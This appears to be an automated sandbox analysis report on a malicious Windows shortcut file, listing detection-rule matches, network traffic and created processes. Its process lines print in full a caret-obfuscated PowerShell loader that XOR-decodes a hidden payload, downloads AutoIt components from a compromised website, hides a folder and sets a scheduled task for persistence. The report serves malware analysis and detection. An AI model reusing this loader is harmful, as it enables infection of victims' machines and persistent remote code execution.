Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y
Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: knfV5IVjEV.lnk, type: SAMPLE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: amsi64_7732.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago

Very long command line found

Source: unknown	Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2948	Jump to behavior

Windows shortcut file (LNK) contains suspicious command line arguments

Source: knfV5IVjEV.lnk

Detected potential crypto function

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DC1B00	8_2_00007FF7F1DC1B00
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9A9B4	8_2_00007FF7F1D9A9B4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDE930	8_2_00007FF7F1DDE930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA44A4	8_2_00007FF7F1DA44A4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDCB60	8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0658	8_2_00007FF7F1DA0658
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DABDE0	8_2_00007FF7F1DABDE0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DBADC8	8_2_00007FF7F1DBADC8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DAB840	8_2_00007FF7F1DAB840
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D91AB0	8_2_00007FF7F1D91AB0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB49D0	8_2_00007FF7F1DB49D0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD2930	8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DBE4F0	8_2_00007FF7F1DBE4F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DC2C88	8_2_00007FF7F1DC2C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DAF458	8_2_00007FF7F1DAF458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0C74	8_2_00007FF7F1DA0C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCCBDC	8_2_00007FF7F1DCCBDC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA7BAC	8_2_00007FF7F1DA7BAC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA9B60	8_2_00007FF7F1DA9B60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9BB5B	8_2_00007FF7F1D9BB5B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD8350	8_2_00007FF7F1DD8350
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9DEA0	8_2_00007FF7F1D9DEA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE0E40	8_2_00007FF7F1DE0E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C55E	8_2_00007FF7F1D9C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C571	8_2_00007FF7F1D9C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C538	8_2_00007FF7F1D9C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C54B	8_2_00007FF7F1D9C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE4D1C	8_2_00007FF7F1DE4D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB88D8	8_2_00007FF7F1DB88D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCD884	8_2_00007FF7F1DCD884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB7888	8_2_00007FF7F1DB7888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D94860	8_2_00007FF7F1D94860
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD0804	8_2_00007FF7F1DD0804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCF810	8_2_00007FF7F1DCF810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE473C	8_2_00007FF7F1DE473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C719	8_2_00007FF7F1D9C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0F28	8_2_00007FF7F1DA0F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4A9B4	12_2_00007FF700E4A9B4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8E930	12_2_00007FF700E8E930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E71B00	12_2_00007FF700E71B00
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8CB60	12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E544A4	12_2_00007FF700E544A4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5BDE0	12_2_00007FF700E5BDE0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E6ADC8	12_2_00007FF700E6ADC8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50658	12_2_00007FF700E50658
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5B840	12_2_00007FF700E5B840
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E649D0	12_2_00007FF700E649D0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E82930	12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E41AB0	12_2_00007FF700E41AB0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7CBDC	12_2_00007FF700E7CBDC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E57BAC	12_2_00007FF700E57BAC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4BB5B	12_2_00007FF700E4BB5B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E59B60	12_2_00007FF700E59B60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E88350	12_2_00007FF700E88350
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E6E4F0	12_2_00007FF700E6E4F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E72C88	12_2_00007FF700E72C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50C74	12_2_00007FF700E50C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5F458	12_2_00007FF700E5F458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C571	12_2_00007FF700E4C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C55E	12_2_00007FF700E4C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C54B	12_2_00007FF700E4C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C538	12_2_00007FF700E4C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E94D1C	12_2_00007FF700E94D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4DEA0	12_2_00007FF700E4DEA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E90E40	12_2_00007FF700E90E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7F810	12_2_00007FF700E7F810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E80804	12_2_00007FF700E80804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9473C	12_2_00007FF700E9473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50F28	12_2_00007FF700E50F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C719	12_2_00007FF700E4C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E688D8	12_2_00007FF700E688D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E67888	12_2_00007FF700E67888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7D884	12_2_00007FF700E7D884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E44860	12_2_00007FF700E44860

Found potential string decryption / allocating functions

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA1E80 appears 69 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E555C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA50B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E55658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA5658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DB1F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E550B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E4A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA55C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DB1FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E54FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E61FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E61F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1D9A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA4FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E51E80 appears 69 times

Yara signature match

Source: knfV5IVjEV.lnk, type: SAMPLE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: amsi64_7732.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.rans.evad.winLNK@25/11@1/2

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1D93434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

8_2_00007FF7F1D93434

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\knfV5IVjEV

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: knfV5IVjEV.lnk	ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk	Virustotal: Detection: 29%

Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 